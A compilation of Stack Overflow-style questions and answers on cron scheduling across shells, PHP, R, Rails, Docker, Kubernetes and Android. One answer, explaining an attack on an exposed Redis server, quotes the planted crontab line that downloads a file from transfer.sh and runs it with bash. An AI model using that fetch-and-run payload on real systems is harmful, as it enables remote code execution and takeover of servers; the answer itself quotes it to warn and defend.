so I have looked at every single script on here regarding deleting directories older than 14 days. The Script I wrote works with files but for some reason it is not deleting the directories. So here is my scripts.#!/bin/bash find /TBD/* -mtim +1 | xargs rm -rfSo this code successfully deleted the FILES inside TBD but it left two directories. I checked the timestamp on them and they are atleast 2 days since last modification according to the timestamp. Specifically Dec 16 16:10 So I can't figure this out. My crontab I have running this runs every minute and logs and in the log it only shows.+ /scripts/deletebackups.sh: :2:BASH_XTRACEFD=3xargs rm -rf + /scripts/deletebackups.sh: :2: BASH_XTRACEFD=3find /TBD/contents TBD/contents -mtime +1I used contents since the contents are actually peoples name in our pxe server. I checked every file and folder INSIDE these two directories and their timestamps are the same as the parent directory as they should be but it's still not deleting.Could it be a permissions thing? I wrote the script using sudo nano deletebackups.sh When I type ls under TBD in the far left it shows drwxr-xr-x 3 hscadministrator root 4096 DEC 16 16:10 for each of the two directories that won't delete. I'm not overly familiar with what all those letters mean.Other iterations of this code I have already attempted arefind /TBD/* -mtime +1 rm -r {} \;
Delete directories older than X days
Have two entries:to run every Monday at 5 AM :0 5 * * 1to run on 1st of every month at 5 AM :0 5 1 * *OR, if you want a single entry, the you may have to do something like:https://github.com/xr09/cron-last-sunday/blob/master/run-if-today
I generated a cron to run every Monday at 5am.0 5 1 * 1The third number, 1, for day of month, has it set to run on the first of every month as well as Monday.Do I change that 1 to 0 so it ignores the day of month? Otherwise it will run every Monday as well as run on the 1st of the month.
run every monday at 5am
If you can use cron, you just have to executecrontab -eOr, if you need to run as root:sudo crontab -eThis will open a text editor so you can modify your crontab and there you'll have one line for each scheduled command, as this one:1 0 * * * php /var/www/myBlog/artisan task:runThe command in this like will be executed at the first minute of every day (0h01 or 12h01am).Here is the explanation of it all:* * * * * <command to execute> ┬ ┬ ┬ ┬ ┬ β”‚ β”‚ β”‚ β”‚ β”‚ β”‚ β”‚ β”‚ β”‚ β”‚ β”‚ β”‚ β”‚ β”‚ └───── day of week (0 - 6) (0 to 6 are Sunday to Saturday, or use names) β”‚ β”‚ β”‚ └────────── month (1 - 12) β”‚ β”‚ └─────────────── day of month (1 - 31) β”‚ └──────────────────── hour (0 - 23) └───────────────────────── min (0 - 59)So, in your case, you'll create a line like this:0 12 * * 0 <command to execute>But how do you do that for a task in Laravel? There are many ways, one of them is in my first example: create an artisan command (task:run) and then just run artisan, or you can just create a route in your app to that will call your task every time it is hit:Route::get('/task/run',array('uses'=>'TaskController@run'));And then you just have to add it your crontab, but you'll need something to hit your url, like wget or curl:0 12 * * 0 curl http://mysite.com/run/task
I've seen some similar questions at SO but none of then have answered me. I had never heard of CRON before and I'm new to Laravel. What I need is to run a Task once a week to perform some actions on my database (MySql), say every sunday at 12:00 am. How could I achieve this goal?
Running Laravel Task at specific time
According to the PHP Command-Line options reference:http://php.net/manual/en/features.commandline.options.phpthe-foption indicates which file the PHP engine should execute, in this casemyscript.php.
What does the"-f"in say* * * * * php -f myscript.phpstand for?
What does -f stand for in "php -f" when running a cron job?
if your list of files from find output is correct just pipe it to tar:find . -name "*.php" -mtime -14 -print | xargs tar cvf backup.tarYou should check tar options in man. You might want use for example -p (preserve permissions), just look for useful options in man and use whatever you need.[Addendum] if your files might contain spaces or newlines, prefer the -print0 and xargs -0 to use null characters as separators:find . -name "*.php" -mtime -14 -print0 | xargs -0 tar cvf backup.tarand to add it to cron, the simplest way if your distro supports it, is to put your script in:/etc/cron.weeklyotherwise you have to modfiy crontab:crontab -eand put there a line like:0 3 * * 6 <user> <your script>it runs a script at 3am every saturday, the last script is day of the week, 0 or 7 is sunday.man 5 crontab:field allowed values ----- -------------- minute 0-59 hour 0-23 day of month 1-31 month 1-12 (or names, see below) day of week 0-7 (0 or 7 is Sun, or use names)
I have a server whose files are modified every so now and again.We want to have a script or cron job that runs every 7 days and finds any php files that have been modified or created in the last 14 days and puts them in a tar or a zip file on the server so it can be downloaded.This command finds the right files:find . -name "*.php" -mtime -14 -printWhat else do I need to do?
Copying / Tarring Files that have been modified in the last 14 days
Best way is to call from the command line in the cron job...php /path/to/index.php controller >> /dev/nullYou can run controllers via the command line in CI, seehere.
I am trying to do a cron job with a site built in CodeIgniter - I've got access to the CPanel cron feature can anyone suggest the best way to setup a cron job using CPanel?I am using CodIgniter so cannot be sure how to call a controller within a cron job?E.ghttp://admin.com/sites/publish/How would I access this publish function within the sites controllers using a cron job?
Cron jobs in codeigniter
Every 10 minutes between 09:00 - 17:00 on weekdays (monday - friday)*/10 09-17 * * 1-5 /path/to/file
I'm trying to set a cron job up to run every ten minutes on weekdays between 9am and 5pm.I have a bunch of jobs set up now to run on weekdays at 10 minute intervals (so 48 jobs)Is there a way to do this in one Cron Job?
Cron Jobs between x and y on weekdays
I can see the dreadedsmart quotesin your cron entry. This often happens when you copy-paste from word processors. Backspace over those abominations and re-type normal quotes. Change:* * * * * Rscript β€œ/Users/Home/Desktop/David Studios/Scraper/compiler.R”to* * * * * Rscript "/Users/Home/Desktop/David Studios/Scraper/compiler.R"See the difference? It's subtle and easy to miss.Update:I see you've made the above change and it's still not working for you. Verify thatRscriptis in the$PATHenvironment variable for the user that owns this crontab. Alternatively, you can simply specify the fully qualified path toRscriptdirectly in the cron entry. You can find that quickly on the command line with the following command:which RscriptUpdate #2:I see by your comments that the fully qualified path toRscriptis/usr/local/bin/Rscript. I'm guessing/usr/local/binis not in the path for the user who owns this crontab. Try using the fully qualified path, like this:* * * * * /usr/local/bin/Rscript "/Users/Home/Desktop/David Studios/Scraper/compiler.R"
For some reason my R script will not run with a crontab. I have it for every minute right now for testing, but will change it once it works.Any ideas?* * * * * Rscript β€œ/Users/Home/Desktop/David Studios/Scraper/compiler.R”Also, this was working as just a normal command in Terminal.
Schedule a Rscript crontab everyminute
I suspect your problem lies in a missing environment variable, specifically the all-important$PATH. When you run this:php -q /tmp/phpinfo.phpthe system must work out what program you mean byphp. It does this by looking, in order, through the directories in the current$PATHenvironment variable.Executed from a normal shell, your environment is set up in such a way that it finds the CLI version of PHP, as you expect.However, whencronexecutes a command, it does so without all the environment variables that your interactive shell would set up. Since there will probably be other executables calledphpon your system, for different "SAPIs", it may pick the "wrong" one - in your case, thecgi-fcgiexecutable, according to the output you report fromphp_sapi_name().To fix this, first find the path to the correctphpexecutable in a normal shell by typing this:which phpThis should give you a path like/usr/bin/php. You can go one further and check if this is actually a "symbolic link" pointing at a different filename:ls -l $(which php)(you'll see an arrow in the output if it is, like/usr/bin/php -> /usr/bin/php5-cli)Then take this full path to the PHP executable and use that in your crontab entry, so it looks something like this:50 8 * * * /usr/bin/php5-cli -q /tmp/phpinfo.php > /tmp/phpinfo
I noticed this problem after a php script ran from cron started to timeout but it was not an issue when it was ran manually from command line. (PHP has max_execution_time is 0 for CLI by default)So I tried to run a simple cron such:50 8 * * * php -q /tmp/phpinfo.php > /tmp/phpinfoThe script would just call phpinfo().Surprisingly it wrote out phpinfo in html format, which suggested that it was not run as CLI. And max_execution_time was 30 in the output.Running the script manually from command line suchphp -q /tmp/phpinfo.php | lesswrote out the php info in text format and max_execution_time was 0 in the output.I know there must be a configuration issue somewhere, but I just could not find where the problem is. This is happening on a production server, which I have a complete control of. Running the same script from cron on my development machine worked fine.Here is the summary of the differencefunction | CLI | cron | php_sapi_name | cli | cgi-fcgi | php_ini_loaded_file | /usr/local/lib/php.ini | /usr/local/lib/php.ini |
Running php from cron did not run as CLI
The cron doesn't load the code from the 'folder' you are in, so you will need to specify a full path$flyer = file_get_contents(dirname(__FILE__) . DIRECTORY_SEPARATOR . "flyer.html");
i'm running a php script that uses file_get_contents in order to mail a list with what it's inside that remote file. If i run the script manually everything works fine, but when i leave it and wait for the cron to run it doesn't get that remote content..... Is that possible? i copy here a bit of the code where i think the problem is:$flyer = file_get_contents('flyer.html'); $desti = $firstname." ".$lastname; $mail = new phpmailer(); $mail->IsSMTP(); $mail->CharSet = 'UTF-8'; $mail->SMTPAuth = true; $mail->SMTPSecure = "ssl"; $mail->Host = "orion.xxxx.com"; // line to be changed $mail->Port = 465; // line to be changed $mail->Username = '[emailΒ protected]'; // line to be changed $mail->Password = 'xxxx90'; // line to be changed $mail->FromName = 'Bob'; // line to be changed $mail->From = '[emailΒ protected]';// line to be changed $mail->AddAddress($email, $desti); $mail->Subject = 'The Gift Store'; // to be changed if ($cover_form == '1'){ $mail->MsgHTML($long10);} else if ($cover_form == '2'){ $mail->MsgHTML($customer);} else if ($cover_form == '3'){ $mail->MsgHTML($freedoers);} else if ($cover_form == '4'){ $mail->MsgHTML($freelongform);} else if ($cover_form == '5'){ $mail->MsgHTML($freestoreshort);} else if ($cover_form == '6'){ $mail->MsgHTML($getasiteshort);} else if ($cover_form == '7'){ $mail->MsgHTML($flyer);} else {}
cron job won't open file_get_contents
You actually have two questions here.Why it printsstdin: is not a tty?This warning message is printed bybash -l. The-l(--login) options asksbashto start the login shell, e.g. the one which is usually started when you enter your password. In this casebashexpects itsstdinto be a real terminal (e.g. theisatty(0)call should return 1), and it's not true if it is run bycronβ€”hence this warning.Another easy way to reproduce this warning, and the very common one, is to run this command viassh:$ ssh[emailΒ protected]'bash -l -c "echo test"' Password: stdin: is not a tty testIt happens becausesshdoes not allocate a terminal when called with a command as a parameter (one should use-toption forsshto force the terminal allocation in this case).Why it did not work without-l?As correctly stated by @Cyrus in the comments, the list of files whichbashloads on start depends on the type of the session. E.g. for login shells it will load/etc/profile,~/.bash_profile,~/.bash_login, and~/.profile(see INVOCATION in manualbash(1)), while for non-login shells it will only load~/.bashrc. It seems you defined yourhttp_proxyvariable only in one of the files loaded for login shells, but not in~/.bashrc. You moved it to~/.wgetrcand it's correct, but you could also define it in~/.bashrcand it would have worked.
I'm getting the following mail every time I execute a specific cronjob. The called script runs fine when I'm calling it directly and even from cron. So the message I get is not an actual error, since the script does exactly what it is supposed to do.Here is the cron.d entry:* * * * * root /bin/bash -l -c "/opt/get.sh > /tmp/file"and the get.sh script itself:#!/bin/sh #group and url groups="foo" url="https://somehost.test/get.php?groups=${groups}" # encryption pass='bar' method='aes-256-xts' pass=$(echo -n $pass | xxd -ps | sed 's/[[:xdigit:]]\{2\}/&/g') encrypted=$(wget -qO- ${url}) decoded=$(echo -n $encrypted | awk -F '#' '{print $1}') iv=$(echo $encrypted | awk -F '#' '{print $2}' |base64 --decode | xxd -ps | sed 's/[[:xdigit:]]\{2\}/&/g') # base64 decode input and save to file output=$(echo -n $decoded | base64 --decode | openssl enc -${method} -d -nosalt -nopad -K ${pass} -iv ${iv}) if [ ! -z "${output}" ]; then echo "${output}" else echo "Error while getting information" fiWhen I'm not using thebash -lsyntax the script hangs during the wget process. So my guess would be that it has something to do with wget and putting the output to stdout. But I have no idea how to fix it.
"stdin: is not a tty" from cronjob
%signs in a crontab command are converted to newlines, and all data after the first%is sent to the command's stdin. Replace each%with\%.(And you only had 4 time fields:* * * *; you need 5 (you later fixed the question).)
This question already has answers here:Is there a special restriction on commands executed by cron? [duplicate](2 answers)Closed5 years ago.I can use this commandmysqldump -u"root" myDB| gzip > mydb_`date +%d-%m-%Y`.sql.gzbut when run in crontab* * * * * mysqldump -u"root" myDB| gzip > mydb_`date +%d-%m-%Y`.sql.gz( this error cause by function date, when i remove it , crontab run good )on ubuntu, it happen this error in log file.ubuntu CRON[xxxx] (user) CMD(mysqldump -u"root" myDB| gzip > mydb_`date+) ubuntu CRON[xxxx] (CRON) error ( grandchild #5353 failed with exit status 2) ubuntu CRON[xxxx] (CRON) info (no MTA installed, discarding output)
Backup database use crontab with date function [duplicate]
If you are using bundler for your application then you don't need to use "/usr/local/bin/rake" as a path for rake.you can just usebundle exec rakeso your new script will be#!/bin/sh source /usr/local/rvm/scripts/rvm cd /home/p1r65759/apps/abbc/ bundle exec rake refresh_events RAILS_ENV=productionbundle exec will work because you are already in your project directory.And don't forgot to include rake in your Gemfile.
I've upgraded to rails 3.0.9 which has introduced the rake issues. I've gotten it all resolved except for a problem with a cron job.This used to work:#!/bin/sh source /usr/local/rvm/scripts/rvm cd /home/p1r65759/apps/abbc/ /usr/local/bin/rake refresh_events RAILS_ENV=productionBut now I get this error: You have already activated rake 0.8.7, but your Gemfile requires rake 0.9.2. Consider using bundle exec. /home/p1r65759/apps/abbc/Rakefile:4:in `' (See full trace by running task with --trace)How do I modify my script to use bundle exec so it will use the proper version of rake and run successfully? Thanks.
cron and bundle exec problem
Redirect the output of the two you don't care about to/dev/nullif you don't ever want to see the output or to some file if you do.
I have 3 jobs in my crontab. I want to recieve emails if only 1 of them fails and not for other two. Is there any way to restric emails to one type of cronjob?
Multiple cronjob emails
You can usebackgroundrb. This, however, will eat up memory away from your main Rails app as it will spawn one Ruby instance exclusive tobackgroundrb.You can also define aSystemController(or equivalent) in your main application, with various actions corresponding to the various household tasks your application should perform. You can "prod" it fromcrontabusingwgetorcurl, the advantage being that it shares resources with your main application. Depending on how paranoid or you are, or on how vulnerable to DOS (or other types of attacks) exposing such a controller to, possibly, the outside world, you may choose to block access to this controller's URL from addresses other than the loopback (ideally in your reverse proxy, alternatively from the controller itself.)
I have an application that checks a database every minute for any emails that are supposed to be sent out at that time. I was thinking about making this a rake task that would be run by a cron job every minute. Would there be a better solution to this?From what I have read, this isn't ideal because rake has to load the entire rails environment every minute and this becomes expensive.Thoughts?Thanks.
Best rails solution for a mailer that runs every minute
Unfortunately, latest Mac OS have put additional layer of security and can't be bypassed.But I found following workaround. Since I am not changing system, so following solution works for me.I have to give full access to program via:System Preferences -> Security & Privacy -> Privacy -> Full Disk Access -> Add Program.
I am trying to automate crontab addition in Mac Catalina 10.15.5 via command:echo -e "* * * * * \run.sh"|crontab -this command replicatescrontab -ecommand and adds the required crontab in the system.But it asks for permission which is not removable via automation.a. Sudo command requires user to enter password, which is again not possible to be automated.b. Tried creating a file and then adding it to crontab viacrontab filepath, but that also requires above elevation.
"Terminal" would like to administer your computer. Administration can include passwords
You will need to set the cron job to run every half an hour, and then look for work based on the timezone that the user is in.So for example you need to send a daily email digest at 6am in each timezone. Let's assume that you have the events for each user in a collection of some kind.Each user record needs to include a timezone that the user is in. When the cron job runs, you do a query to find the users that need to receive a digest that are in the timezone where it is currently 6am. Then you send the email and clear out the queued events.
I have one cron which I want to run around 6:00 am in IST and same cron should also run same time 6:00 am EAT.I am usingsynced-cronfor running cron jobs on my meteor server.If I have only few timezones to support I would have ran this cron 2 times a day and it would have worked but I have multiple timezones to support in future. How can I automate same thing with little effort.
How to run cron on same time in different time zones?
You can write anotherpython code (B)to call your originalpython code (A)usingPopenfromsubprocess. Inpython code (B), ask the program towaitfor yourpython code (A). If'A'exits with anerror code,recallit fromB.I provide an example for python_code_B.pyimport subprocess filename = 'my_python_code_A.py' while True: """However, you should be careful with the '.wait()'""" p = subprocess.Popen('python '+filename, shell=True).wait() """#if your there is an error from running 'my_python_code_A.py', the while loop will be repeated, otherwise the program will break from the loop""" if p != 0: continue else: breakThis will generally work well on Unix / Windows systems. Tested on Win7/10 with latest code update.Also, please runpython_code_B.pyfrom a 'real terminal' which means running from a command prompt or terminal, and not in IDLE.
I run a Python Discord bot. I import some modules and have some events. Now and then, it seems like the script gets killed for some unknown reason. Maybe because of an error/exception or some connection issue maybe? I'm no Python expert but I managed to get my bot working pretty well, I just don't exactly understand how it works under the hood (since the program does nothing besides waiting for events). Either way, I'd like it to restart automatically after it stops.I use Windows 10 and just start my program either by double-clicking on it or through pythonw.exe if I don't want the window. What would be the best approach to verify if my program is still running (it doesn't have to be instant, the verification could be done every X minutes)? I thought of using a batch file or another Python script but I have no idea how to do such thing.Thanks for your help.
Automatically restart a Python program if it's killed
This is indeed an attack. If you check your redis keys after this happens you will see few "string" keys like this: "Backup1", "Backup2", "Backup3".The value of these will be something like this:"\t\n*/2 * * * * curl -s https://transfer.sh/QMvW6/tmp.M8pAEgBA6T > .cmd && bash .cmd\n\t"This is meant to modify your crontab.Bottom line is - don't have redis port opened to the world.
I have set up my redis-server so thatCONFIG GET dir --> "/var/lib/redis"andCONFIG GET dbfilename --> "redis.rdb".However, after my server has been running a few hours or a few days, I start getting the"Failed opening .rdb for saving: Permission denied"error.If I again doCONFIG GET dir --> "/var/spool/cron"andCONFIG GET dbfilename --> "root". I have tried looking all over the place for some kind of understanding of what is happening, but without avail.If I simply restart my redis-server, then the config is once again reset to the original settings that I set up in the "redis.conf" file.
Redis config dir periodically modified to "/var/spool/cron" with "Failed opening .rdb for saving: Permission denied" error
To exclude thegrepresult from thepsoutput. Dops -aux | grep -v grep | grep sidekiq(or) do aregExsearch of the process name, i.e.sfollowed by rest of the process name.ps -aux | grep [s]idekiqTo avoid such conflicts in the search use processgreppgrepdirectly with the process namepgrep sidekiqAn efficient way to usepgrepwould be something like below.if pgrep sidekiq >/dev/null then echo "Process is running." else echo "Process is not running." fi
I have created restart.sh with followin code#!/bin/bash ps -aux | grep sidekiq > /dev/null if [ $? -eq 0 ]; then echo "Process is running." else echo "Process is not running." fiTo check if sidekiq process is running or not. I will put this script in cron to run daily so if sidekiq is not running, it will start automatically.My problem is, withps -aux | grep sidekiqeven when the process is not running, it showsmyname 27906 0.0 0.0 10432 668 pts/0 S+ 22:48 0:00 grep --color=auto sidekiqinstead of nothing. This gets counted in grep hence even when the process is not running, it shows as "sidekiq" process is running. How to not count this result ? I believe I have to use awk but I am not sure how to use it here for better filtering.
Check if a process is running and if not, restart it using Cron
There is one main advantage of Supervisor that the task you set there is working constantly. This mean that when the proces will finish the new one will starts immediately.Crontabruns every process for a minutue minimum! So if you have a task likequeue:workis much better to useSupervisoroverCrontab.
I have to run a laravel commandphp artisan queue:work --daemonto run jobs stored on Beanstalkd queues.I have come across two possible solutions:Run commands using Supervisord:Register a command in the config files of Supervisord and start it.Run commands using CronJobs:*/1 * * * * /usr/bin/php /var/www/laravelProj/artisan queue:work --daemon --tries=3Can someone please explain what way should I go and what would be the best for performance enhancement.
Supervisor VS CronJobs
You are actually including a sudo in there. Sudo requires a password, you would have to add a configuration item in sudoers to run that script passwordless. Your other option is to add it to the root cron. Use @Haleemur's redirection command to redirect the output to the logs. I would actually suggest using the following as well just in case it fails and outputs to STDERR@reboot python /home/Desktop/Application.py >> /home/Desktop/log_file 2>&1UPDATE:try running the following command from the terminalpython /home/Desktop/Application.py >> /home/Desktop/log_file 2>&1if it works in the command line, there is no reason it shouldn't work in cron.
I am using crontab to autostart the program, using the following command in cronatb@reboot sudo python /home/Desktop/Appllication.pyIs it possible to write all the logs (errors and other stuff) by appending something to the above command, so that cron writes all errors/ any related events to a log ?UPDATE: The code prints values in the python idle terminal when run individually using the print command. How do I make this data which is printed on the terminal to be written to the log file. for ex, if my code is like print "food morning" , how do I get this to be written into the log file instead of printing on terminal.TEST CODE:import time while(1): print "testing" time.sleep(5)
writing logs using crontab
If you are using the new Console for your projects in app engine then this is how it will look like after you have selected a project to view fromhttps://console.developers.google.com/projectusing your google account.Hope it helps!
This might be a dumb question, but, i just can't find cron jobs panel, I've got an app in java and I need to refresh the data every day, so I create this cron.xml inside WEB-INF:<?xml version="1.0" encoding="UTF-8"?> <cronentries> <cron> <url>/refreshdata</url> <description>Daily data refresh cron task </description> <schedule>every day 05:00</schedule> </cron> </cronentries>I deployed it, but it doesnt work and I cant find the "cron job panel" in console to monitor it or even check if GAE recognizes it...Documentation says " (You can verify the Cron job you just deployed by clicking Cron Jobs in the left nav pane.)https://i.stack.imgur.com/1niVt.png"but it doesn't exist anymore, gae's console UI changed, where it is now? I tried in logs without successit is something wrong with my .xml?Any help would be apreciated, thanks.
Monitor google app engine cron jobs in console?
Make sure you are starting Cygwin with Administrator privileges. Right click on your Cygwin shortcut, then 'Run as Administrator'.
I am trying to set-up cron on my CYGWIN installation on a Win7 box. I am using the procedure mentiond here:How do you run a crontab in Cygwin on Windows?This is how I try to start the cron-service:> cygrunsrv -I cron -p /usr/sbin/cron -a -DThe response that I get is:cygrunsrv: Error installing a service: OpenSCMManager: Win 32 error 5: Access deniedAny tips on how to proceed?
cygwin: Starting cron as a service (access denied)
Yes, you can do this. You'll just need to assign an identifier to the task being written to crontab:whenever --update-crontab some_identifier_nameIt will generate an entry in crontab like this:# Begin Whenever generated tasks for: some_identifier_name 0,5,10,15,20,25,30,35,40,45,50,55 * * * * /bin/bash -l -c 'cd /var/www/test/releases/20120416183153 && script/rails runner -e production '\''Model.some_method'\'' >> /tmp/cron_log.log 2>&1' # End Whenever generated tasks for: some_identifier_nameThen whenever you call the command above it will only update where it finds the identifier you specified.
I am using:Ruby 1.9.2whenever 0.7.2capistrano 2.9.0capistrano-ext 1.2.1I am using whenever in conjunction with Capistrano on deploys to manage my crontab files.I noticed that it completely rewrites my crontab files each time.I'd like to be able to set environment variables in cron to control PATH and MAILTO settings, which are regular cron environment variables.Is there a way to make whenever not overwrite the entire crontab file, so that I can add customizations to my crontab file and be sure that they will persist?
Can the whenever gem preserve existing lines in a crontab file?
Assuming a UNIX-like operating system you could setup a cron job that pointed to a shell script like the following:#!/bin/sh cd [source directory] ftp -n [destination host]<<END user [user] [password] put [source file] quit ENDDepending on your ftp client defaults and the source file type you may need to specifybinaryprior to theput.
Is it possible to use CRON to upload a file via FTP? If yes how can I call FTP to run an upload?
cron jobs to upload a file via FTP
The solution isdocker system prune -f, which will remove all stopped containers, all unused networks, all dangling images and build caches.You can use crontab to periodic running this command. Look at this example of crontab:0 3 * * * /usr/bin/docker system prune -fYou can also put this command into your script:#!/bin/sh docker stop registry docker system prune -f docker run -d -p 5000:5000 --restart=always --name registry -v /etc/docker/registry/config.yml:/etc/docker/registry/config.yml registry:2
docker system prunewants answer y/n. How to i pass in shell script my shell script#!/bin/sh docker stop registry docker system prune docker run -d -p 5000:5000 --restart=always --name registry -v /etc/docker/registry/config.yml:/etc/docker/registry/config.yml registry:2I'm configured cron expression as every minutescrontab -e* * * * * /bin/sh /home/sansli/dc.shHow do i test? I'm checking the created dated as docker ps -a
How to write shell script for docker system prune as schedule
In a Dockerfile, the RUN command is only execute when building the image.If you want to start cron when you start your container, you should runcroninCMD. I modified your Dockerfile by removingRUN service cron startand changing yourENTRYPOINT.FROM ruby:2.4.0-slim RUN apt-get update RUN apt-get install -qq -y --no-install-recommends build-essential libpq-dev cron postgresql-client RUN cp /usr/share/zoneinfo/Europe/Moscow /etc/localtime ENV LANG C.UTF-8 ENV RAILS_ENV production ENV INSTALL_PATH /app RUN mkdir $INSTALL_PATH RUN touch /log/cron.log ADD Gemfile Gemfile.lock ./ WORKDIR $INSTALL_PATH RUN bundle install --binstubs --without development test COPY . . RUN bundle exec whenever --update-crontab CMD cron && bundle exec pumaIt's a best practice to reduce the number of layer an image have, for example, you should always combine RUN apt-get update with apt-get install in the same RUN statement, and clean apt files after:rm -rf /var/lib/apt/lists/*FROM ruby:2.4.0-slim RUN apt-get update && \ apt-get install -qq -y --no-install-recommends build-essential libpq-dev cron postgresql-client \ rm -rf /var/lib/apt/lists/* && \ cp /usr/share/zoneinfo/Europe/Moscow /etc/localtime ENV LANG C.UTF-8 ENV RAILS_ENV production ENV INSTALL_PATH /app RUN mkdir $INSTALL_PATH && \ touch /log/cron.log ADD Gemfile Gemfile.lock ./ WORKDIR $INSTALL_PATH RUN bundle install --binstubs --without development test COPY . . RUN bundle exec whenever --update-crontab CMD cron && bundle exec puma
My crontasks fromschedule.rbdoesn't work on docker container, butcrontab -lresult already contains this lines:# Begin Whenever generated tasks for: /app/config/schedule.rb 45 19 * * * /bin/bash -l -c 'bundle exec rake stats:cleanup' 45 19 * * * /bin/bash -l -c 'bundle exec rake stats:count' 0 5 * * * /bin/bash -l -c 'bundle exec rake stats:history' # End Whenever generated tasks for: /app/config/schedule.rbI can run this commands manually in container and it works. It seems like cron doesn't start.Dockerfile:FROM ruby:2.4.0-slim RUN apt-get update RUN apt-get install -qq -y --no-install-recommends build-essential libpq-dev cron postgresql-client RUN cp /usr/share/zoneinfo/Europe/Moscow /etc/localtime ENV LANG C.UTF-8 ENV RAILS_ENV production ENV INSTALL_PATH /app RUN mkdir $INSTALL_PATH RUN touch /log/cron.log ADD Gemfile Gemfile.lock ./ WORKDIR $INSTALL_PATH RUN bundle install --binstubs --without development test COPY . . RUN bundle exec whenever --update-crontab RUN service cron start ENTRYPOINT ["bundle", "exec", "puma"]
rails, whenever and docker - cron tasks doesn't run
Thexdotoolcommand is automation tool for X11 which allows you simulate keyboard/mouse input, but since crontab is run independently, it's required to defineDISPLAYvariable to specify which X Window System display server to use. Normally when you're login to the desktop this variable is assigned automatically, but crontab is running jobs in isolated environment (doesn't have even a tty associated), especially when you run commands viarootaccount.So in short, you should do define your job like:*/1 * * * * DISPLAY=:0 /usr/local/bin/refresh.shOr you can define variables at the beginning of the file (in case of Vixie cron). See:Variables in crontab?Also make sure the user which is running the job has granted access to the selected X display. If you need to grant the access, you need to assign the permission viaxhostandsetfaclcommands and specify extraXAUTHORITYvariable, see:Xdotool using β€œDISPLAY=:0”for more details.
I am new to using crontab, and I've been trying to get a simple cron job. I want press F5 every 1 minute to refresh Mozzila Firefox. I am using xdotool for press F5. I have script/usr/local/bin/refresh.sh:#!/bin/bash xdotool search --name "Mozilla Firefox" key F5If i run it in command line it works fine. And permission:-rwxr-xr-x. 1 root root 89 15. čec 10.32 refresh.shIncrontabi have:*/1 * * * * cd /usr/local/bin && sh refresh.shBut script run by cron doesnt work. Can anyone tell me what i do wrong?
Cron xdotool doesn't run
Although this is a very old question, there is no correct answer posted, so let me leave this here for the next guy.Magento'scron_scheduletable is only populated with cron jobs that are scheduled to runin the near future. The reason you're not seeing your cron job in the table is because it only runs once a day, precisely at 23:55. Magento will add this cron job to thecron_scheduletable at around 23:45, depending on your server cron job configuration and Magento's cron job settings inSystem > Configuration > System > Cron. Take note of theGenerate Schedules EveryandSchedule Ahead forsettings, which define how often and how far ahead Magento generates the schedule.
I made magento module which export product in csv file. Now i want to run cronjob every day at 23.55. I set config.xml as it is written inmagento cronjob wiki.My code:<crontab> <jobs> <gcompany_runprofilescronjob> <schedule> <cron_expr>55 23 * * *</cron_expr> </schedule> <run> <model>export/export_csv::runprofilescronjob</model> </run> </gcompany_runprofilescronjob> </jobs> </crontab>I also set cronjob on server. When cronjob run, all cronjobs in magento are stored in database table cron_schedule but not my gcompany_runprofilescronjob. If i set different interval for example:<cron_expr>*/1 * * * *</cron_expr>My cronjob is written in database but in execute every minute which i don't want... I want that my function is executed every day at 23.55. Any suggestions what i am doing wrong?
magento cron job and cron_scheduler table
You need to change the date of the underlying OS. Tomcat has no separate clock. You also should restart the tomcat afterwards..
I need to change tomcat server date in order to check whether my cron expression will be triggered on needed day and time or not. How can I do this?Thanks!
How to change tomcat server date?
Possible usingICronTrigger.CronExpressionStringCronScheduleBuilder csb = CronScheduleBuilder .WeeklyOnDayAndHourAndMinute(DayOfWeek.Monday, 12, 0); ICronTrigger trigger = (ICronTrigger)TriggerBuilder .Create() .WithSchedule(csb) .Build(); string cronExpression = trigger.CronExpressionString;
Is it possible using the Quartz .NET assembly to generate a cron expression? I saw that theCronScheduleBuilderclass has a private membercronExpressionwhich is essentially what I am looking for. Is there any other way to get the cron expression itself?
Create Cron Expression using Quartz .NET
If you want it to stay after the device reboots, you have to schedule the alarm after the device reboots.You will need to have theRECEIVE_BOOT_COMPLETEDpermission in your AndroidManifest.xml<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />A BroadcastReceiver is needed as well to capture the intentACTION_BOOT_COMPLETED<receiver android:name=".BootCompletedReceiver"> <intent-filter> <action android:name="android.intent.action.BOOT_COMPLETED" /> </intent-filter> </receiver>Lastly, override the onReceive method in your BroadcastReceiver.public class BootcompletedReceiver extends BroadcastReceiver { @Override public void onReceive(Context context, Intent intent) { //set alarm } }Edit: Look at thesetRepeatingmethod of AlarmManager to schedule the 'Android cron'.
How can I execute an action (maybe an Intent) on every specified time (e.g. Every day on 5AM)? It has to stay after device reboots, similar to how cron works.I am not sure if I can useAlarmManagerfor this, or can I?
How to set a persistent/regular schedule in Android?
Cron jobs are usually not executed via http servers, so use the Task Scheduler to execute the php interpreter and provide the physical path to your php script as a commandline argument.
How would I go about setting up a PHP cron job in IIS?
How to set up a cron job for PHP on IIS?
From kubernetes documentationConcurrency Policy specifies how to treat concurrent executions of a job that is created by this cron job. The spec may specify only one of the following concurrency policies:Allow (default): The cron job allows concurrently running jobsForbid: The cron job does not allow concurrent runs; if it is time for a new job run and the previous job run hasn’t finished yet, the cron job skips the new job runReplace: If it is time for a new job run and the previous job run hasn’t finished yet, the cron job replaces the currently running job run with a new job runIn your case'concurrencyPolicy: Forbid'should work. It will not allow new job to be run if the previous job is still running. The problem is not with concurrencyPolicy in your case.It might be related to startingDeadlineSeconds. can you remove it and try
I need a cron job to run every 5 minutes. If an earlier cron job is still running, another cron job should not start. I tried setting concurrency policy to Forbid, but then the cron job does not run at all.Job gets launched every 5 minutes as expected, but it launches even if the earlier cron job has not completed yetspec: concurrencyPolicy: Allow schedule: '*/5 * * * *'This is supposed to solve the problem, but the cron job never gets launched with this approachspec: concurrencyPolicy: Forbid schedule: '*/5 * * * *'Setting the startingDeadlineSeconds to 3600, or even to 10, did not make a difference.spec: concurrencyPolicy: Forbid schedule: '*/5 * * * *' startingDeadlineSeconds: 10Could someone please help me here?
How to prevent a Cronjob execution in Kubernetes if there is already a job running? concurrencyPolicy:Forbid stops the cron job execution altogether
Not sure what about gitlab CI, but cron syntax is minute, hour, day of month, month, day of week, meaning job which should run every week day from 6am is0 6 * * 1-5
I was wondering if anyone knew how to create a cron job that runs from monday to friday at 6am.I am using gitlab CI, quickly looked at the example syntax and am not exactly sure how to limit it to occur from monday to friday.
Cron job for every weekday at 6 am
